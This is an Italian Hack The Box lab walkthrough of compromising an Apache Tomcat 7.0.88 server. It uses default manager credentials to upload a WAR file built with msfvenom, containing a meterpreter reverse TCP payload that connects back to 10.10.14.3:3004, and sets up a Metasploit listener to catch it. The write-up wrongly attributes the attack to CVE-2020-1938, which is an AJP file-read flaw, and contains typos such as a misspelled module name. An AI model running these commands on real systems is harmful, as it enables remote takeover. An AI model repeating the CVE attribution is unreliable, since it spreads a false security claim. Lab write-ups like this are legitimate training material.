
Walkthrough passo-passo per sfruttare CVE-2020-1938 (upload arbitrario JSP di Apache Tomcat a RCE) usando msfvenom e Metasploit in un ambiente di laboratorio Hack The Box.
CVE-2020-1938 è una vulnerabilità critica che colpisce Apache Tomcat dalla versione 9.0.0.M1 alla 9.0.0.30, dalla 8.5.0 alla 8.5.50 e dalla 7.0.0 alla 7.0.99 ⚠️ Questa è stata sfruttata in un lab di Hack The Box.
🔗 Riferimento: Voce NIST NVD
Il sito web ha credenziali predefinite per la funzionalità Server Status.
Questa interfaccia indica che la versione è Apache Tomcat/7.0.88, con architettura a 64 bit.
Da questa interfaccia navighiamo fino all'elenco delle applicazioni, che espone una funzionalità di di file .war.
Se il caricamento riesce, il file .war viene eseguito su /directory/filename
La ricerca sulla versione di Apache Tomcat ha confermato la vulnerabilità a CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
Usando msfvenom, che è un generatore di payload di Metasploit, generiamo il nostro payload exploit.war.
Dopo la generazione del file, entra nel file e trova il nome del file .jsp, ad esempio gcvxdtmxvw.jsp, e salvalo per dopo.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
Usando msfconsole impostiamo un listener che attende l'esecuzione del nostro payload.


Carichiamo il nostro file nella sezione deploy, dopodiché aggiorniamo la schermata e scopriamo che il file è stato caricato con successo. Per completare l'exploit dobbiamo navigare al percorso ip/hacked/gcvxdtmxvw.jsp.

Questo blocca la richiesta, ma siamo in grado di vedere localmente sulla nostra macchina che abbiamo una connessione inversa.